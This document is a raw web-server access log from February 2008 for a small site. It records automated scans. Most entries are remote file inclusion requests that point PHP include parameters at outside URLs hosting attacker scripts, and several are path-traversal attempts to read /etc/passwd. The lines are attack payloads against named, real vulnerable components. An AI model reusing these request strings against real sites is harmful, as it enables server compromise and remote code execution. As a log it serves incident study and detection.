66.79.163.220 - - [10/Feb/2008:17:05:40 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:05:40 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:05:40 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.15.147.244 - - [10/Feb/2008:17:05:41 -0800] "GET /ipblock.inc.php?path_escape=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
86.109.165.53 - - [10/Feb/2008:17:05:53 -0800] "GET /?mosConfig_absolute_path=http://www.image1hosting.com/test.txt??? HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
86.109.165.53 - - [10/Feb/2008:17:05:55 -0800] "GET /logs/?mosConfig_absolute_path=http://www.image1hosting.com/test.txt??? HTTP/1.1" 200 3512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
86.109.165.53 - - [10/Feb/2008:17:06:25 -0800] "GET /index.php?page=http://www.image1hosting.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
86.109.165.53 - - [10/Feb/2008:17:06:25 -0800] "GET /logs/index.php?page=http://www.image1hosting.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
209.160.42.74 - - [10/Feb/2008:17:06:40 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.160.42.74 - - [10/Feb/2008:17:06:40 -0800] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:06:47 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:06:47 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:07:55 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:07:55 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:07:55 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:07:55 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:07:55 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:07:55 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.54.46.178 - - [10/Feb/2008:17:08:29 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.54.46.178 - - [10/Feb/2008:17:08:29 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.54.46.178 - - [10/Feb/2008:17:08:29 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.29.89.97 - - [10/Feb/2008:17:09:11 -0800] "GET /logs/access.log/modules/vwar/admin/admin.php?vwar_root=http://suwung.890m.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.89.97 - - [10/Feb/2008:17:09:11 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://suwung.890m.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:17:14:19 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:17:14:48 -0800] "GET /logs/access_071203.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:17:14:48 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:17:14:48 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:17:15:04 -0800] "GET /logs/access.log//script_path/templates/2blue/bodyTemplate.php?serverPath=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.19.15.138 - - [10/Feb/2008:17:15:18 -0800] "GET /logs/order/login.php?svr_rootscript=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
67.19.15.138 - - [10/Feb/2008:17:15:18 -0800] "GET /order/login.php?svr_rootscript=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:17:16:08 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.joomla-mongolia.com/administrator/modules/magpierss/search.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:17:16:08 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.joomla-mongolia.com/administrator/modules/magpierss/search.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
74.54.46.178 - - [10/Feb/2008:17:17:48 -0800] "GET /logs/access_071231.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:17:58 -0800] "GET /logs/access_071231.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:18:00 -0800] "GET /logs/access_071231.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:20:47 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:20:47 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:20:47 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:20:47 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:20:47 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:17:20:50 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.160.42.74 - - [10/Feb/2008:17:21:12 -0800] "GET /logs/djpage.php?page=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.160.42.74 - - [10/Feb/2008:17:21:12 -0800] "GET /djpage.php?page=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:17:22:54 -0800] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:17:22:54 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.54.46.178 - - [10/Feb/2008:17:22:55 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.54.46.178 - - [10/Feb/2008:17:22:55 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.54.46.178 - - [10/Feb/2008:17:22:55 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:17:23:07 -0800] "GET /logs/access_080204.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:17:23:08 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:17:23:08 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.15.147.244 - - [10/Feb/2008:17:23:44 -0800] "GET /logs/access_080114.log/ipblock.inc.php?path_escape=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.15.147.244 - - [10/Feb/2008:17:23:44 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.15.147.244 - - [10/Feb/2008:17:23:51 -0800] "GET /logs/access_080127.log/ipblock.inc.php?path_escape=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.15.147.244 - - [10/Feb/2008:17:23:57 -0800] "GET /logs/access_080114.log/config.inc.php?path_escape=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.15.147.244 - - [10/Feb/2008:17:23:57 -0800] "GET /logs/config.inc.php?path_escape=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:17:24:04 -0800] "GET /logs/access_080114.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.15.147.244 - - [10/Feb/2008:17:24:04 -0800] "GET /logs/access_080127.log/config.inc.php?path_escape=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.142.25.74 - - [10/Feb/2008:17:24:06 -0800] "GET /logs//config.inc.php?path_escape=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.toulouseangloexchange.com"
83.142.25.74 - - [10/Feb/2008:17:24:10 -0800] "GET //config.inc.php?path_escape=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:17:24:31 -0800] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.6.19.119 - - [10/Feb/2008:17:26:00 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
72.30.216.106 - - [10/Feb/2008:17:26:00 -0800] "GET /logs/access_080114.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:17:29:59 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:17:35:54 -0800] "GET ///language/lang_german/lang_main_album.php?phpbb_root_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:17:37:26 -0800] "GET //include.php?path[docroot]=http://www.bes.org.tr/imgcls/testin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.237.131.20 - - [10/Feb/2008:17:38:29 -0800] "GET /ipblock.inc.php?path_escape=http://www.image1hosting.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.toulouseangloexchange.com"
80.237.131.20 - - [10/Feb/2008:17:38:29 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.image1hosting.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.toulouseangloexchange.com"
74.6.24.75 - - [10/Feb/2008:17:39:15 -0800] "GET / HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:17:39:29 -0800] "GET /logs/access_071126.log//include.php?path[docroot]=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:17:39:30 -0800] "GET //include.php?path[docroot]=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:17:39:30 -0800] "GET /logs//include.php?path[docroot]=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:17:39:48 -0800] "GET /logs/access_071203.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.218.85.18 - - [10/Feb/2008:17:39:53 -0800] "GET /logs/access_071119.log//include.php?path[docroot]=http://www.bes.org.tr/imgcls/testmodin.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:17:40:17 -0800] "GET /logs/access_080114.log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:41:22 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:17:43:05 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:17:43:09 -0800] "GET /logs/access_071112.log///language/lang_german/lang_main_album.php?phpbb_root_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:17:43:09 -0800] "GET /logs///language/lang_german/lang_main_album.php?phpbb_root_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:17:43:09 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
83.142.25.74 - - [10/Feb/2008:17:43:26 -0800] "GET //modules/myAds/index.php?pa=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.toulouseangloexchange.com"
83.142.25.74 - - [10/Feb/2008:17:43:26 -0800] "GET /logs//modules/myAds/index.php?pa=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:17:43:28 -0800] "GET /logs/access_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
83.142.25.74 - - [10/Feb/2008:17:44:09 -0800] "GET /logs//path/comments-display-tpl.php?language_file=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.toulouseangloexchange.com"
83.142.25.74 - - [10/Feb/2008:17:44:09 -0800] "GET //path/comments-display-tpl.php?language_file=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.toulouseangloexchange.com"
207.210.115.178 - - [10/Feb/2008:17:44:15 -0800] "GET /logs/access_071015.log///language/lang_german/lang_main_album.php?phpbb_root_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.15.147.244 - - [10/Feb/2008:17:44:18 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:17:44:24 -0800] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:17:44:24 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:17:44:24 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:44:24 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:44:55 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.142.25.74 - - [10/Feb/2008:17:45:07 -0800] "GET /logs//path/comments-display-tpl.php?config[comments_form_tpl]=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.toulouseangloexchange.com"
83.142.25.74 - - [10/Feb/2008:17:45:13 -0800] "GET //path/comments-display-tpl.php?config[comments_form_tpl]=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:17:46:56 -0800] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:17:49:05 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.joomla-mongolia.com/administrator/modules/magpierss/search.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:17:49:05 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.joomla-mongolia.com/administrator/modules/magpierss/search.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:17:51:05 -0800] "GET /logs/access_071126.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:17:51:24 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:17:51:39 -0800] "GET /logs/access_071126.log//appserv/main.php?appserv_root=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:17:51:40 -0800] "GET //appserv/main.php?appserv_root=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:51:43 -0800] "GET /logs/access_071210.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:51:43 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:17:51:44 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:51:47 -0800] "GET /logs/access_071126.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.115.89.60 - - [10/Feb/2008:17:52:24 -0800] "GET /logs/access_080127.log//components/com_performs/performs.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.115.89.60 - - [10/Feb/2008:17:52:33 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.115.89.60 - - [10/Feb/2008:17:52:46 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:52:58 -0800] "GET /logs/access_071217.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
